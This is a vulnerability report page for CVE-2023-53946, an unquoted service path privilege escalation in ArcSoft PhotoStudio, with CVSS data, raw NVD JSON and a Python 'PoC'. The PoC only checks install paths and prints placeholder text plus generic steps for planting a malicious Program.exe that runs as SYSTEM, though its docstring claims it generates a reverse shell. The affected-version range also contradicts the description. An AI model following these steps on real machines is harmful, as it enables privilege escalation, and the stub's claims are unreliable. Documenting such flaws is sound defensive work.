Security Vulnerability Report
CVE-2023-53946 CVSS 8.4 HIGH

CVE-2023-53946

Published: 2025-12-19 21:15:50
Last Modified: 2026-04-15 00:35:42

Description

Arcsoft PhotoStudio 6.0.0.172 contains an unquoted service path vulnerability in the ArcSoft Exchange Service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the unquoted path and trigger the service to execute arbitrary code with system-level permissions.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ArcSoft PhotoStudio < 6.0.0.172
ArcSoft Exchange Service (all versions with unquoted path)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53946 PoC - Unquoted Service Path Privilege Escalation
# Target: ArcSoft Exchange Service in ArcSoft PhotoStudio 6.0.0.172
# Author: Security Researcher
# Note: This is for educational and authorized testing purposes only

import os
import sys
import subprocess
import shutil


def check_vulnerability():
    """Check if the system is vulnerable to CVE-2023-53946"""
    print("[*] Checking for vulnerable ArcSoft PhotoStudio installation...")

    # Common installation paths for ArcSoft PhotoStudio
    paths_to_check = [
        r"C:\Program Files\ArcSoft\PhotoStudio\ArcSoft Exchange Service.exe",
        r"C:\Program Files (x86)\ArcSoft\PhotoStudio\ArcSoft Exchange Service.exe"
    ]

    for path in paths_to_check:
        if os.path.exists(path):
            print(f"[+] Found ArcSoft Exchange Service at: {path}")
            print("[+] System may be vulnerable to CVE-2023-53946")
            return True

    print("[-] ArcSoft PhotoStudio not found or not installed")
    return False


def create_malicious_executable():
    """Generate a reverse shell payload as the malicious executable"""
    print("[*] Generating malicious executable...")

    # The executable should be named according to the unquoted path
    # For example: if path is C:\Program Files\ArcSoft\...
    # attacker places Program.exe in a writable directory

    # This would contain actual malicious code in real attack
    # For demonstration, we create a simple executable stub
    print("[*] Payload generation placeholder")
    print("[*] In real attack: Create executable named 'Program.exe' or similar")
    return True


def exploit():
    """Exploitation steps for CVE-2023-53946"""
    print("\n[*] CVE-2023-53946 Exploitation Steps:")
    print("=" * 60)
    print("1. Identify writable directory in unquoted service path")
    print("2. Create malicious executable with name matching path component")
    print("3. Place malicious executable in writable directory")
    print("4. Wait for service restart or trigger manually")
    print("5. Malicious code executes with SYSTEM privileges")
    print("=" * 60)
    return True


if __name__ == "__main__":
    print("CVE-2023-53946 - ArcSoft PhotoStudio Unquoted Service Path")
    print("Author: Security Researcher | For authorized testing only\n")

    if os.name == 'nt':
        check_vulnerability()
        create_malicious_executable()
        exploit()
    else:
        print("[-] This exploit only works on Windows systems")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53946", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:49.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arcsoft PhotoStudio 6.0.0.172 contains an unquoted service path vulnerability in the ArcSoft Exchange Service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the unquoted path and trigger the service to execute arbitrary code with system-level permissions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.arcsoft.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51393", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/arcsoft-photostudio-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}